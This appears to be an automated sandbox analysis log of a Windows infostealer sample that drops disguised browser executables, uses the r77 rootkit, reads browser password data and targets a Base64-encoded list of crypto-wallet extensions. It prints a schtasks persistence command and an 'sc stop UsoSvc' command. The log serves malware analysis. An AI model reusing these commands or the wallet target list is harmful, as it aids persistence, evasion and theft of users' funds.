Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File created: C:\Users\user\AppData\Local\Temp\zonewar.exe

Jump to behavior

Source: nss3.dll.53.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.53.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3.dll.53.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: nss3.dll.53.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: nss3.dll.53.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: nss3.dll.53.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: vbc.exe, 00000035.00000003.406523211.0000000008654000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.409118954.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, aeSUC9unMzxl.53.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: 0.3.N2wufLmC74.exe.a00000.0.unpack, BrEx.cs

Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Mutant created: \Sessions\1\BaseNamedObjects\Microsoft{5a7c2b28-e152-4c69-88f1-288764f0bf1a}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\CJIbIWY_3OB_E6AT_AZOB
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3600:120:WilError_01
Source: C:\Users\user\AppData\Local\Google\brave.exe	Mutant created: \Sessions\1\BaseNamedObjects\EaBeAaAa__shmem3_winpthreads_tdm_
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5100:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: N2wufLmC74.exe

Static file information: File size 2580721 > 1048576

Source: N2wufLmC74.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe, 00000033.00000000.346486371.00000000002D1000.00000020.00000001.01000000.0000000E.sdmp, GoogleUpdate.exe, 0000003B.00000000.364430667.00000000002D1000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: ofg.exe, 00000016.00000002.517260533.0000000000590000.00000040.00000400.00020000.00000000.sdmp, ofg.exe, 0000001A.00000002.520359531.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, ofg.exe, 0000001A.00000002.519375426.00000000028F0000.00000040.00000400.00020000.00000000.sdmp, chrome.exe, 00000034.00000002.538809265.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, chrome.exe, 00000034.00000002.539019041.0000000003310000.00000040.00001000.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.465336952.0000000006C20000.00000040.00001000.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.463868930.0000000006A90000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: WSHEJM~1.JPGWSHEJMDVQC.jpg.pdb source: vbc.exe, 00000035.00000003.448037942.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: brave.exe, 0000000E.00000002.403453712.00000227AD0B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: brave.exe, 0000000E.00000002.403453712.00000227AD0B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: nss3.dll.53.dr
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: brave.exe, 0000000E.00000002.403453712.00000227AD0B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.53.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Google\chrome.exe

Unpacked PE file: 52.2.chrome.exe.3310000.2.unpack

Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0145D1C0 push edi; mov dword ptr [esp], ebx	0_2_0145D737
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014610C0 push eax; mov dword ptr [esp], esi	0_2_0147905D
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0145F340 push eax; mov dword ptr [esp], esi	0_2_0147905D
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014443D0 push eax; mov dword ptr [esp], ebx	0_2_01444640
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014443D0 push edx; mov dword ptr [esp], ebx	0_2_0144465A
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01445200 push eax; mov dword ptr [esp], ebx	0_2_01445534
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01445200 push edx; mov dword ptr [esp], ebx	0_2_01445553
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013EBA4A push eax; mov dword ptr [esp], ebx	0_2_0147A366
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014612A0 push eax; mov dword ptr [esp], esi	0_2_0147905D
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0143A560 push eax; mov dword ptr [esp], ebx	0_2_0143A7C8
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014314C0 push eax; mov dword ptr [esp], ebx	0_2_01431732
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01459760 push eax; mov dword ptr [esp], ebx	0_2_01459AFF
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014457D0 push eax; mov dword ptr [esp], ebx	0_2_01445B04
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014457D0 push edx; mov dword ptr [esp], ebx	0_2_01445B23
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01441690 push eax; mov dword ptr [esp], ebx	0_2_014417BB
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0142D900 push eax; mov dword ptr [esp], ebx	0_2_0142DEFF
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013E8960 push eax; mov dword ptr [esp], ebx	0_2_0147A836
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013E8960 push edx; mov dword ptr [esp], edi	0_2_0147A876
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0145C9E0 push edi; mov dword ptr [esp], ebx	0_2_0145CF57
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0142E8C0 push eax; mov dword ptr [esp], ebx	0_2_0142EEC5
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014418F0 push eax; mov dword ptr [esp], ebx	0_2_01441A13
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01407890 push eax; mov dword ptr [esp], ebx	0_2_01407A8A
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0142DF40 push eax; mov dword ptr [esp], ebx	0_2_0142E53F
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0142EF00 push eax; mov dword ptr [esp], ebx	0_2_0142F505
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF715E52598 push rbx; retf	14_2_00007FF715E5259A

Source: C:\Users\user\Desktop\N2wufLmC74.exe

Code function: 0_2_013C14C0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_013C14C0

Source: conchsvt.exe.2.dr

Static PE information: 0xC91EEA10 [Thu Dec 3 18:40:16 2076 UTC]

Source: N2wufLmC74.exe	Static PE information: section name: /4
Source: N2wufLmC74.exe	Static PE information: section name: /14
Source: N2wufLmC74.exe	Static PE information: section name: /29
Source: N2wufLmC74.exe	Static PE information: section name: /41
Source: N2wufLmC74.exe	Static PE information: section name: /55
Source: N2wufLmC74.exe	Static PE information: section name: /67
Source: N2wufLmC74.exe	Static PE information: section name: /80
Source: N2wufLmC74.exe	Static PE information: section name: /91
Source: N2wufLmC74.exe	Static PE information: section name: /107
Source: zonewar.exe.2.dr	Static PE information: section name: /4
Source: zonewar.exe.2.dr	Static PE information: section name: /14
Source: zonewar.exe.2.dr	Static PE information: section name: /29
Source: zonewar.exe.2.dr	Static PE information: section name: /41
Source: zonewar.exe.2.dr	Static PE information: section name: /55
Source: zonewar.exe.2.dr	Static PE information: section name: /67
Source: zonewar.exe.2.dr	Static PE information: section name: /80
Source: brave.exe.2.dr	Static PE information: section name: .xdata
Source: updater.exe.14.dr	Static PE information: section name: .xdata
Source: 8FB9.tmp.14.dr	Static PE information: section name: _RDATA
Source: msvcp140.dll.53.dr	Static PE information: section name: .didat
Source: mozglue.dll.53.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.53.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.53.dr	Static PE information: section name: .00cfg
Source: sqlite3.dll.53.dr	Static PE information: section name: /4
Source: sqlite3.dll.53.dr	Static PE information: section name: /19
Source: sqlite3.dll.53.dr	Static PE information: section name: /31
Source: sqlite3.dll.53.dr	Static PE information: section name: /45
Source: sqlite3.dll.53.dr	Static PE information: section name: /57
Source: sqlite3.dll.53.dr	Static PE information: section name: /70
Source: sqlite3.dll.53.dr	Static PE information: section name: /81
Source: sqlite3.dll.53.dr	Static PE information: section name: /92
Source: nss3.dll.53.dr	Static PE information: section name: .00cfg

Source: updater.exe.14.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ef
Source: brave.exe.2.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ee
Source: 8FB9.tmp.14.dr	Static PE information: real checksum: 0x0 should be: 0x5841e
Source: N2wufLmC74.exe	Static PE information: real checksum: 0x2719d7 should be: 0x280738
Source: ofg.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x1938e

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Local\Google\chrome.exe

Executable created and started: C:\Windows\GoogleUpdate.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\brave.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\brave.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\chrome.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\LocalLow\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\ofg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\brave.exe	File created: C:\Users\user\AppData\Local\Temp\8FB9.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\zonewar.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\chrome.exe	File created: C:\Windows\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Google\chrome.exe

File created: C:\Windows\GoogleUpdate.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Google\brave.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\8FB9.TMP

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
